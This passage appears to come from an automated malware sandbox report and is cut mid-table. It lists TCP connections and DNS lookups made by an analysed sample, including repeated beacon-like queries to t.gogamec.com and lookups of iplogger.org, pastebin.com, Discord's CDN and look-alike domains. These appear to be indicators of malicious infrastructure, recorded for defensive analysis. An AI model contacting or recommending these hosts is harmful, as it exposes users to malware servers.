                                      Aug 21, 2024 11:00:50.813383102 CEST6010727643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:00:50.813635111 CEST6010727643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:00:50.818989992 CEST276436010745.142.215.47192.168.2.4
                                      Aug 21, 2024 11:00:51.630851984 CEST276436010745.142.215.47192.168.2.4
                                      Aug 21, 2024 11:00:51.631364107 CEST6010727643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:00:51.631546974 CEST6010727643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:00:52.196746111 CEST60108443192.168.2.4162.159.130.233
                                      Aug 21, 2024 11:00:52.196803093 CEST44360108162.159.130.233192.168.2.4
                                      Aug 21, 2024 11:00:52.196907997 CEST60108443192.168.2.4162.159.130.233
                                      Aug 21, 2024 11:00:52.197216988 CEST60108443192.168.2.4162.159.130.233
                                      Aug 21, 2024 11:00:52.197235107 CEST44360108162.159.130.233192.168.2.4
                                      Aug 21, 2024 11:00:52.681055069 CEST44360108162.159.130.233192.168.2.4
                                      Aug 21, 2024 11:00:52.683119059 CEST60108443192.168.2.4162.159.130.233
                                      Aug 21, 2024 11:00:52.683170080 CEST44360108162.159.130.233192.168.2.4
                                      Aug 21, 2024 11:00:52.835329056 CEST44360108162.159.130.233192.168.2.4
                                      Aug 21, 2024 11:00:52.835417986 CEST44360108162.159.130.233192.168.2.4
                                      Aug 21, 2024 11:00:52.835681915 CEST60108443192.168.2.4162.159.130.233
                                      Aug 21, 2024 11:00:52.835984945 CEST60108443192.168.2.4162.159.130.233
                                      Aug 21, 2024 11:00:53.447602987 CEST601094805192.168.2.4135.181.129.119
                                      Aug 21, 2024 11:00:53.452699900 CEST480560109135.181.129.119192.168.2.4
                                      Aug 21, 2024 11:00:53.455460072 CEST601094805192.168.2.4135.181.129.119
                                      Aug 21, 2024 11:00:53.666393995 CEST6010680192.168.2.445.9.20.13
                                      Aug 21, 2024 11:00:53.670577049 CEST6011080192.168.2.445.9.20.13
                                      Aug 21, 2024 11:00:53.675506115 CEST806011045.9.20.13192.168.2.4
                                      Aug 21, 2024 11:00:53.675568104 CEST6011080192.168.2.445.9.20.13
                                      Aug 21, 2024 11:00:53.676177025 CEST6011080192.168.2.445.9.20.13
                                      Aug 21, 2024 11:00:53.681036949 CEST806011045.9.20.13192.168.2.4
                                      Aug 21, 2024 11:00:53.920233011 CEST601094805192.168.2.4135.181.129.119
                                      Aug 21, 2024 11:00:53.925108910 CEST480560109135.181.129.119192.168.2.4
                                      Aug 21, 2024 11:00:55.184710026 CEST480560109135.181.129.119192.168.2.4
                                      Aug 21, 2024 11:00:55.184779882 CEST601094805192.168.2.4135.181.129.119
                                      Aug 21, 2024 11:00:55.185152054 CEST601094805192.168.2.4135.181.129.119
                                      Aug 21, 2024 11:00:56.635413885 CEST6011127643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:00:56.640284061 CEST276436011145.142.215.47192.168.2.4
                                      Aug 21, 2024 11:00:56.643357038 CEST6011127643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:00:56.643630028 CEST6011127643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:00:56.648499966 CEST276436011145.142.215.47192.168.2.4
                                      Aug 21, 2024 11:00:57.460186958 CEST276436011145.142.215.47192.168.2.4
                                      Aug 21, 2024 11:00:57.463380098 CEST6011127643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:00:57.464523077 CEST6011127643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:00:57.690083981 CEST6011080192.168.2.445.9.20.13
                                      Aug 21, 2024 11:00:57.837555885 CEST60112443192.168.2.4162.159.130.233
                                      Aug 21, 2024 11:00:57.837666035 CEST44360112162.159.130.233192.168.2.4
                                      Aug 21, 2024 11:00:57.837770939 CEST60112443192.168.2.4162.159.130.233
                                      Aug 21, 2024 11:00:57.838205099 CEST60112443192.168.2.4162.159.130.233
                                      Aug 21, 2024 11:00:57.838238955 CEST44360112162.159.130.233192.168.2.4
                                      Aug 21, 2024 11:00:57.841602087 CEST6011380192.168.2.445.9.20.13
                                      Aug 21, 2024 11:00:57.846538067 CEST806011345.9.20.13192.168.2.4
                                      Aug 21, 2024 11:00:57.846627951 CEST6011380192.168.2.445.9.20.13
                                      Aug 21, 2024 11:00:57.847359896 CEST6011380192.168.2.445.9.20.13
                                      Aug 21, 2024 11:00:57.852387905 CEST806011345.9.20.13192.168.2.4
                                      Aug 21, 2024 11:00:58.340399981 CEST44360112162.159.130.233192.168.2.4
                                      Aug 21, 2024 11:00:58.341624022 CEST60112443192.168.2.4162.159.130.233
                                      Aug 21, 2024 11:00:58.341702938 CEST44360112162.159.130.233192.168.2.4
                                      Aug 21, 2024 11:00:58.477515936 CEST44360112162.159.130.233192.168.2.4
                                      Aug 21, 2024 11:00:58.477696896 CEST44360112162.159.130.233192.168.2.4
                                      Aug 21, 2024 11:00:58.477808952 CEST60112443192.168.2.4162.159.130.233
                                      Aug 21, 2024 11:00:58.478279114 CEST60112443192.168.2.4162.159.130.233
                                      Aug 21, 2024 11:01:00.386986017 CEST601144805192.168.2.4135.181.129.119
                                      Aug 21, 2024 11:01:00.392251015 CEST480560114135.181.129.119192.168.2.4
                                      Aug 21, 2024 11:01:00.393368006 CEST601144805192.168.2.4135.181.129.119
                                      Aug 21, 2024 11:01:00.395479918 CEST601144805192.168.2.4135.181.129.119
                                      Aug 21, 2024 11:01:00.400446892 CEST480560114135.181.129.119192.168.2.4
                                      Aug 21, 2024 11:01:01.853398085 CEST6011380192.168.2.445.9.20.13
                                      Aug 21, 2024 11:01:01.857007027 CEST6011580192.168.2.445.9.20.13
                                      Aug 21, 2024 11:01:01.863511086 CEST806011545.9.20.13192.168.2.4
                                      Aug 21, 2024 11:01:01.863605022 CEST6011580192.168.2.445.9.20.13
                                      Aug 21, 2024 11:01:01.863835096 CEST6011580192.168.2.445.9.20.13
                                      Aug 21, 2024 11:01:01.871263981 CEST806011545.9.20.13192.168.2.4
                                      Aug 21, 2024 11:01:02.082735062 CEST480560114135.181.129.119192.168.2.4
                                      Aug 21, 2024 11:01:02.082808971 CEST601144805192.168.2.4135.181.129.119
                                      Aug 21, 2024 11:01:02.083126068 CEST601144805192.168.2.4135.181.129.119
                                      Aug 21, 2024 11:01:02.479187965 CEST6011627643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:01:02.484055996 CEST276436011645.142.215.47192.168.2.4
                                      Aug 21, 2024 11:01:02.484128952 CEST6011627643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:01:02.484380960 CEST6011627643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:01:02.489238024 CEST276436011645.142.215.47192.168.2.4
                                      Aug 21, 2024 11:01:03.308873892 CEST276436011645.142.215.47192.168.2.4
                                      Aug 21, 2024 11:01:03.309583902 CEST6011627643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:01:03.310839891 CEST6011627643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:01:03.546715021 CEST60117443192.168.2.4162.159.133.233
                                      Aug 21, 2024 11:01:03.546782970 CEST44360117162.159.133.233192.168.2.4
                                      Aug 21, 2024 11:01:03.547092915 CEST60117443192.168.2.4162.159.133.233
                                      Aug 21, 2024 11:01:03.547548056 CEST60117443192.168.2.4162.159.133.233
                                      Aug 21, 2024 11:01:03.547565937 CEST44360117162.159.133.233192.168.2.4
                                      Aug 21, 2024 11:01:04.032088041 CEST44360117162.159.133.233192.168.2.4
                                      Aug 21, 2024 11:01:04.033895016 CEST60117443192.168.2.4162.159.133.233
                                      Aug 21, 2024 11:01:04.033915997 CEST44360117162.159.133.233192.168.2.4
                                      Aug 21, 2024 11:01:04.164710999 CEST44360117162.159.133.233192.168.2.4
                                      Aug 21, 2024 11:01:04.164803982 CEST44360117162.159.133.233192.168.2.4
                                      Aug 21, 2024 11:01:04.164905071 CEST60117443192.168.2.4162.159.133.233
                                      Aug 21, 2024 11:01:04.165734053 CEST60117443192.168.2.4162.159.133.233
                                      Aug 21, 2024 11:01:05.881179094 CEST6011580192.168.2.445.9.20.13
                                      Aug 21, 2024 11:01:05.993206978 CEST6011880192.168.2.445.9.20.13
                                      Aug 21, 2024 11:01:05.999483109 CEST806011845.9.20.13192.168.2.4
                                      Aug 21, 2024 11:01:05.999664068 CEST6011880192.168.2.445.9.20.13
                                      Aug 21, 2024 11:01:06.001876116 CEST6011880192.168.2.445.9.20.13
                                      Aug 21, 2024 11:01:06.008100986 CEST806011845.9.20.13192.168.2.4
                                      Aug 21, 2024 11:01:07.088742018 CEST601194805192.168.2.4135.181.129.119
                                      Aug 21, 2024 11:01:07.094252110 CEST480560119135.181.129.119192.168.2.4
                                      Aug 21, 2024 11:01:07.094376087 CEST601194805192.168.2.4135.181.129.119
                                      Aug 21, 2024 11:01:07.094640017 CEST601194805192.168.2.4135.181.129.119
                                      Aug 21, 2024 11:01:07.100614071 CEST480560119135.181.129.119192.168.2.4
                                      Aug 21, 2024 11:01:08.802195072 CEST480560119135.181.129.119192.168.2.4
                                      Aug 21, 2024 11:01:08.802597046 CEST601194805192.168.2.4135.181.129.119
                                      Aug 21, 2024 11:01:11.240359068 CEST601194805192.168.2.4135.181.129.119
                                      Aug 21, 2024 11:01:16.245237112 CEST601204805192.168.2.4135.181.129.119
                                      Aug 21, 2024 11:01:16.250394106 CEST480560120135.181.129.119192.168.2.4
                                      Aug 21, 2024 11:01:16.250466108 CEST601204805192.168.2.4135.181.129.119
                                      Aug 21, 2024 11:01:16.250648975 CEST601204805192.168.2.4135.181.129.119
                                      Aug 21, 2024 11:01:16.255845070 CEST480560120135.181.129.119192.168.2.4
                                      Aug 21, 2024 11:01:16.353676081 CEST60121443192.168.2.4162.159.133.233
                                      Aug 21, 2024 11:01:16.353724957 CEST44360121162.159.133.233192.168.2.4
                                      Aug 21, 2024 11:01:16.353789091 CEST60121443192.168.2.4162.159.133.233
                                      Aug 21, 2024 11:01:16.354015112 CEST60121443192.168.2.4162.159.133.233
                                      Aug 21, 2024 11:01:16.354022026 CEST44360121162.159.133.233192.168.2.4
                                      Aug 21, 2024 11:01:16.541816950 CEST6012227643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:01:16.547168016 CEST276436012245.142.215.47192.168.2.4
                                      Aug 21, 2024 11:01:16.547252893 CEST6012227643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:01:16.547461987 CEST6012227643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:01:16.552284956 CEST276436012245.142.215.47192.168.2.4
                                      Aug 21, 2024 11:01:16.822139025 CEST44360121162.159.133.233192.168.2.4
                                      Aug 21, 2024 11:01:16.867852926 CEST60121443192.168.2.4162.159.133.233
                                      Aug 21, 2024 11:01:17.388575077 CEST276436012245.142.215.47192.168.2.4
                                      Aug 21, 2024 11:01:17.388673067 CEST6012227643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:01:17.985362053 CEST480560120135.181.129.119192.168.2.4
                                      Aug 21, 2024 11:01:17.985656023 CEST601204805192.168.2.4135.181.129.119
                                      TimestampSource PortDest PortSource IPDest IP
                                      Aug 21, 2024 10:57:04.734324932 CEST4922853192.168.2.41.1.1.1
                                      Aug 21, 2024 10:57:04.754440069 CEST53492281.1.1.1192.168.2.4
                                      Aug 21, 2024 10:57:10.045305014 CEST5449253192.168.2.41.1.1.1
                                      Aug 21, 2024 10:57:10.050796986 CEST5129353192.168.2.41.1.1.1
                                      Aug 21, 2024 10:57:10.052150965 CEST53544921.1.1.1192.168.2.4
                                      Aug 21, 2024 10:57:10.057504892 CEST53512931.1.1.1192.168.2.4
                                      Aug 21, 2024 10:57:10.856256008 CEST4923653192.168.2.41.1.1.1
                                      Aug 21, 2024 10:57:10.864006996 CEST53492361.1.1.1192.168.2.4
                                      Aug 21, 2024 10:57:13.681660891 CEST6169653192.168.2.41.1.1.1
                                      Aug 21, 2024 10:57:13.690707922 CEST53616961.1.1.1192.168.2.4
                                      Aug 21, 2024 10:57:13.829448938 CEST5543653192.168.2.41.1.1.1
                                      Aug 21, 2024 10:57:13.839729071 CEST53554361.1.1.1192.168.2.4
                                      Aug 21, 2024 10:57:13.841700077 CEST5686553192.168.2.41.1.1.1
                                      Aug 21, 2024 10:57:13.988709927 CEST53568651.1.1.1192.168.2.4
                                      Aug 21, 2024 10:57:14.014298916 CEST5578153192.168.2.41.1.1.1
                                      Aug 21, 2024 10:57:14.031333923 CEST53557811.1.1.1192.168.2.4
                                      Aug 21, 2024 10:57:14.143168926 CEST5506553192.168.2.41.1.1.1
                                      Aug 21, 2024 10:57:14.155388117 CEST53550651.1.1.1192.168.2.4
                                      Aug 21, 2024 10:57:15.752553940 CEST5744553192.168.2.41.1.1.1
                                      Aug 21, 2024 10:57:15.763009071 CEST53574451.1.1.1192.168.2.4
                                      Aug 21, 2024 10:57:21.028954029 CEST6487253192.168.2.41.1.1.1
                                      Aug 21, 2024 10:57:21.063889980 CEST53648721.1.1.1192.168.2.4
                                      Aug 21, 2024 10:57:23.005860090 CEST5023853192.168.2.41.1.1.1
                                      Aug 21, 2024 10:57:23.016902924 CEST53502381.1.1.1192.168.2.4
                                      Aug 21, 2024 10:57:25.793355942 CEST5431753192.168.2.41.1.1.1
                                      Aug 21, 2024 10:57:25.803114891 CEST53543171.1.1.1192.168.2.4
                                      Aug 21, 2024 10:57:28.455341101 CEST5262553192.168.2.41.1.1.1
                                      Aug 21, 2024 10:57:28.462510109 CEST53526251.1.1.1192.168.2.4
                                      Aug 21, 2024 10:57:29.724462986 CEST6067553192.168.2.41.1.1.1
                                      Aug 21, 2024 10:57:29.891536951 CEST53606751.1.1.1192.168.2.4
                                      Aug 21, 2024 10:57:30.767766953 CEST5267053192.168.2.41.1.1.1
                                      Aug 21, 2024 10:57:30.803325891 CEST53526701.1.1.1192.168.2.4
                                      Aug 21, 2024 10:57:35.742930889 CEST5905753192.168.2.41.1.1.1
                                      Aug 21, 2024 10:57:35.752973080 CEST53590571.1.1.1192.168.2.4
                                      Aug 21, 2024 10:57:40.743252039 CEST5762553192.168.2.41.1.1.1
                                      Aug 21, 2024 10:57:40.775892019 CEST53576251.1.1.1192.168.2.4
                                      Aug 21, 2024 10:57:45.743918896 CEST5192353192.168.2.41.1.1.1
                                      Aug 21, 2024 10:57:45.776489973 CEST53519231.1.1.1192.168.2.4
                                      Aug 21, 2024 10:57:48.967084885 CEST5316253192.168.2.41.1.1.1
                                      Aug 21, 2024 10:57:49.609154940 CEST53531621.1.1.1192.168.2.4
                                      Aug 21, 2024 10:57:50.744375944 CEST5446353192.168.2.41.1.1.1
                                      Aug 21, 2024 10:57:50.758833885 CEST53544631.1.1.1192.168.2.4
                                      Aug 21, 2024 10:57:55.743808985 CEST6369553192.168.2.41.1.1.1
                                      Aug 21, 2024 10:57:55.753973961 CEST53636951.1.1.1192.168.2.4
                                      Aug 21, 2024 10:58:00.743480921 CEST5783153192.168.2.41.1.1.1
                                      Aug 21, 2024 10:58:01.064625978 CEST53578311.1.1.1192.168.2.4
                                      Aug 21, 2024 10:58:05.743520975 CEST5256953192.168.2.41.1.1.1
                                      Aug 21, 2024 10:58:05.754246950 CEST53525691.1.1.1192.168.2.4
                                      Aug 21, 2024 10:58:10.744029045 CEST5716553192.168.2.41.1.1.1
                                      Aug 21, 2024 10:58:10.777149916 CEST53571651.1.1.1192.168.2.4
                                      Aug 21, 2024 10:58:15.744858027 CEST5110653192.168.2.41.1.1.1
                                      Aug 21, 2024 10:58:15.756114960 CEST53511061.1.1.1192.168.2.4
                                      Aug 21, 2024 10:58:20.745326996 CEST5905553192.168.2.41.1.1.1
                                      Aug 21, 2024 10:58:20.770121098 CEST53590551.1.1.1192.168.2.4
                                      Aug 21, 2024 10:58:25.758608103 CEST5241253192.168.2.41.1.1.1
                                      Aug 21, 2024 10:58:25.768310070 CEST53524121.1.1.1192.168.2.4
                                      Aug 21, 2024 10:58:30.743027925 CEST5685353192.168.2.41.1.1.1
                                      Aug 21, 2024 10:58:30.754036903 CEST53568531.1.1.1192.168.2.4
                                      Aug 21, 2024 10:58:35.743433952 CEST6409953192.168.2.41.1.1.1
                                      Aug 21, 2024 10:58:36.758357048 CEST6409953192.168.2.41.1.1.1
                                      Aug 21, 2024 10:58:36.959250927 CEST53640991.1.1.1192.168.2.4
                                      Aug 21, 2024 10:58:36.971368074 CEST53640991.1.1.1192.168.2.4
                                      Aug 21, 2024 10:58:40.895093918 CEST5327353192.168.2.41.1.1.1
                                      Aug 21, 2024 10:58:41.157186985 CEST53532731.1.1.1192.168.2.4
                                      Aug 21, 2024 10:58:45.743963003 CEST5383753192.168.2.41.1.1.1
                                      Aug 21, 2024 10:58:45.900995970 CEST53538371.1.1.1192.168.2.4
                                      Aug 21, 2024 10:58:50.744288921 CEST6133753192.168.2.41.1.1.1
                                      Aug 21, 2024 10:58:50.754959106 CEST53613371.1.1.1192.168.2.4
                                      Aug 21, 2024 10:58:55.743697882 CEST5063653192.168.2.41.1.1.1
                                      Aug 21, 2024 10:58:55.780023098 CEST53506361.1.1.1192.168.2.4
                                      Aug 21, 2024 10:59:00.744194031 CEST6191253192.168.2.41.1.1.1
                                      Aug 21, 2024 10:59:00.753262997 CEST53619121.1.1.1192.168.2.4
                                      Aug 21, 2024 10:59:05.743172884 CEST5102253192.168.2.41.1.1.1
                                      Aug 21, 2024 10:59:05.752636909 CEST53510221.1.1.1192.168.2.4
                                      Aug 21, 2024 10:59:10.743697882 CEST5432053192.168.2.41.1.1.1
                                      Aug 21, 2024 10:59:10.778723001 CEST53543201.1.1.1192.168.2.4
                                      Aug 21, 2024 10:59:15.743554115 CEST5357053192.168.2.41.1.1.1
                                      Aug 21, 2024 10:59:15.920403957 CEST53535701.1.1.1192.168.2.4
                                      Aug 21, 2024 10:59:20.743550062 CEST6313653192.168.2.41.1.1.1
                                      Aug 21, 2024 10:59:20.757042885 CEST53631361.1.1.1192.168.2.4
                                      Aug 21, 2024 10:59:25.904891014 CEST5195253192.168.2.41.1.1.1
                                      Aug 21, 2024 10:59:25.915009975 CEST53519521.1.1.1192.168.2.4
                                      Aug 21, 2024 10:59:30.743612051 CEST5783253192.168.2.41.1.1.1
                                      Aug 21, 2024 10:59:31.029889107 CEST53578321.1.1.1192.168.2.4
                                      Aug 21, 2024 10:59:35.743594885 CEST5203453192.168.2.41.1.1.1
                                      Aug 21, 2024 10:59:35.751316071 CEST53520341.1.1.1192.168.2.4
                                      Aug 21, 2024 10:59:40.743170023 CEST5690753192.168.2.41.1.1.1
                                      Aug 21, 2024 10:59:40.753799915 CEST53569071.1.1.1192.168.2.4
                                      Aug 21, 2024 10:59:45.743052959 CEST6141753192.168.2.41.1.1.1
                                      Aug 21, 2024 10:59:45.774305105 CEST53614171.1.1.1192.168.2.4
                                      Aug 21, 2024 10:59:50.746447086 CEST6144853192.168.2.41.1.1.1
                                      Aug 21, 2024 10:59:50.756500959 CEST53614481.1.1.1192.168.2.4
                                      Aug 21, 2024 10:59:55.744219065 CEST5122353192.168.2.41.1.1.1
                                      Aug 21, 2024 10:59:55.751503944 CEST53512231.1.1.1192.168.2.4
                                      Aug 21, 2024 11:00:00.747690916 CEST5133853192.168.2.41.1.1.1
                                      Aug 21, 2024 11:00:00.754420042 CEST53513381.1.1.1192.168.2.4
                                      Aug 21, 2024 11:00:05.743555069 CEST6114353192.168.2.41.1.1.1
                                      Aug 21, 2024 11:00:05.751183033 CEST53611431.1.1.1192.168.2.4
                                      Aug 21, 2024 11:00:10.744560003 CEST5812453192.168.2.41.1.1.1
                                      Aug 21, 2024 11:00:10.756506920 CEST53581241.1.1.1192.168.2.4
                                      Aug 21, 2024 11:00:15.744064093 CEST4982453192.168.2.41.1.1.1
                                      Aug 21, 2024 11:00:15.752898932 CEST53498241.1.1.1192.168.2.4
                                      Aug 21, 2024 11:00:20.743937969 CEST5349853192.168.2.41.1.1.1
                                      Aug 21, 2024 11:00:20.751422882 CEST53534981.1.1.1192.168.2.4
                                      Aug 21, 2024 11:00:25.743568897 CEST5081553192.168.2.41.1.1.1
                                      Aug 21, 2024 11:00:25.751151085 CEST53508151.1.1.1192.168.2.4
                                      Aug 21, 2024 11:00:30.744314909 CEST5956953192.168.2.41.1.1.1
                                      Aug 21, 2024 11:00:30.805304050 CEST5956953192.168.2.41.1.1.1
                                      Aug 21, 2024 11:00:31.242646933 CEST53595691.1.1.1192.168.2.4
                                      Aug 21, 2024 11:00:31.242655039 CEST53595691.1.1.1192.168.2.4
                                      Aug 21, 2024 11:00:35.753916025 CEST6479753192.168.2.41.1.1.1
                                      Aug 21, 2024 11:00:35.764540911 CEST53647971.1.1.1192.168.2.4
                                      Aug 21, 2024 11:00:40.743437052 CEST5403353192.168.2.41.1.1.1
                                      Aug 21, 2024 11:00:40.752430916 CEST53540331.1.1.1192.168.2.4
                                      Aug 21, 2024 11:00:45.744724989 CEST6390853192.168.2.41.1.1.1
                                      Aug 21, 2024 11:00:45.754983902 CEST53639081.1.1.1192.168.2.4
                                      Aug 21, 2024 11:00:50.743674040 CEST5511153192.168.2.41.1.1.1
                                      Aug 21, 2024 11:00:50.752052069 CEST53551111.1.1.1192.168.2.4
                                      Aug 21, 2024 11:00:55.743526936 CEST6130153192.168.2.41.1.1.1
                                      Aug 21, 2024 11:00:55.751274109 CEST53613011.1.1.1192.168.2.4
                                      Aug 21, 2024 11:01:00.752156019 CEST6341753192.168.2.41.1.1.1
                                      Aug 21, 2024 11:01:00.759634972 CEST53634171.1.1.1192.168.2.4
                                      Aug 21, 2024 11:01:03.512377024 CEST5899653192.168.2.41.1.1.1
                                      Aug 21, 2024 11:01:03.519846916 CEST53589961.1.1.1192.168.2.4
                                      Aug 21, 2024 11:01:05.743944883 CEST5657153192.168.2.41.1.1.1
                                      Aug 21, 2024 11:01:05.830436945 CEST5657153192.168.2.41.1.1.1
                                      Aug 21, 2024 11:01:05.904736042 CEST53565711.1.1.1192.168.2.4
                                      Aug 21, 2024 11:01:05.905031919 CEST53565711.1.1.1192.168.2.4
                                      Aug 21, 2024 11:01:11.384921074 CEST5742153192.168.2.41.1.1.1
                                      Aug 21, 2024 11:01:11.398274899 CEST53574211.1.1.1192.168.2.4
                                      Aug 21, 2024 11:01:15.744168997 CEST6277453192.168.2.41.1.1.1
                                      Aug 21, 2024 11:01:15.752178907 CEST53627741.1.1.1192.168.2.4
                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Aug 21, 2024 10:57:04.734324932 CEST192.168.2.41.1.1.10x64ffStandard query (0)hsiens.xyzA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:10.045305014 CEST192.168.2.41.1.1.10xbf8fStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:10.050796986 CEST192.168.2.41.1.1.10x70e6Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:10.856256008 CEST192.168.2.41.1.1.10x92f3Standard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:13.681660891 CEST192.168.2.41.1.1.10x6aceStandard query (0)topniemannpickshop.ccA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:13.829448938 CEST192.168.2.41.1.1.10xbd73Standard query (0)niemannbest.meA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:13.841700077 CEST192.168.2.41.1.1.10x9622Standard query (0)all-mobile-pa1ments.com.mxA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:14.014298916 CEST192.168.2.41.1.1.10x83ebStandard query (0)buy-fantasy-football.com.sgA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:14.143168926 CEST192.168.2.41.1.1.10xcb2Standard query (0)iplogger.orgA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:15.752553940 CEST192.168.2.41.1.1.10xb156Standard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:21.028954029 CEST192.168.2.41.1.1.10x947fStandard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:23.005860090 CEST192.168.2.41.1.1.10x2dc9Standard query (0)ggg-cl.bizA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:25.793355942 CEST192.168.2.41.1.1.10x6db2Standard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:28.455341101 CEST192.168.2.41.1.1.10x3f5Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:29.724462986 CEST192.168.2.41.1.1.10xd325Standard query (0)wfsdragon.ruA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:30.767766953 CEST192.168.2.41.1.1.10x7d7cStandard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:35.742930889 CEST192.168.2.41.1.1.10xd1fbStandard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:40.743252039 CEST192.168.2.41.1.1.10x7744Standard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:45.743918896 CEST192.168.2.41.1.1.10xcf29Standard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:48.967084885 CEST192.168.2.41.1.1.10x1b57Standard query (0)gmpeople.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:50.744375944 CEST192.168.2.41.1.1.10xc351Standard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:57:55.743808985 CEST192.168.2.41.1.1.10xca43Standard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:58:00.743480921 CEST192.168.2.41.1.1.10xc9f2Standard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:58:05.743520975 CEST192.168.2.41.1.1.10x59edStandard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:58:10.744029045 CEST192.168.2.41.1.1.10x4f54Standard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:58:15.744858027 CEST192.168.2.41.1.1.10x36a2Standard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:58:20.745326996 CEST192.168.2.41.1.1.10x9b2eStandard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:58:25.758608103 CEST192.168.2.41.1.1.10x97c7Standard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:58:30.743027925 CEST192.168.2.41.1.1.10xb6afStandard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:58:35.743433952 CEST192.168.2.41.1.1.10x98a0Standard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:58:36.758357048 CEST192.168.2.41.1.1.10x98a0Standard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:58:40.895093918 CEST192.168.2.41.1.1.10xe2fbStandard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:58:45.743963003 CEST192.168.2.41.1.1.10x12d3Standard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:58:50.744288921 CEST192.168.2.41.1.1.10xe701Standard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:58:55.743697882 CEST192.168.2.41.1.1.10x1405Standard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:59:00.744194031 CEST192.168.2.41.1.1.10xa53dStandard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:59:05.743172884 CEST192.168.2.41.1.1.10x1271Standard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:59:10.743697882 CEST192.168.2.41.1.1.10x1fc4Standard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:59:15.743554115 CEST192.168.2.41.1.1.10x1e1eStandard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:59:20.743550062 CEST192.168.2.41.1.1.10x3497Standard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:59:25.904891014 CEST192.168.2.41.1.1.10xcfe6Standard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:59:30.743612051 CEST192.168.2.41.1.1.10x5e0aStandard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:59:35.743594885 CEST192.168.2.41.1.1.10x6fbaStandard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:59:40.743170023 CEST192.168.2.41.1.1.10xb888Standard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:59:45.743052959 CEST192.168.2.41.1.1.10x9414Standard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:59:50.746447086 CEST192.168.2.41.1.1.10xa557Standard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 10:59:55.744219065 CEST192.168.2.41.1.1.10x6917Standard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 11:00:00.747690916 CEST192.168.2.41.1.1.10xa030Standard query (0)t.gogamec.comA (IP address)IN (0x0001)false
                                      Aug 21, 2024 11:00:05.743555069 CEST192.168.2.41.1.1.10xc42dStandard query (0)t.gogamec.comA (IP address)IN (0x0001)false
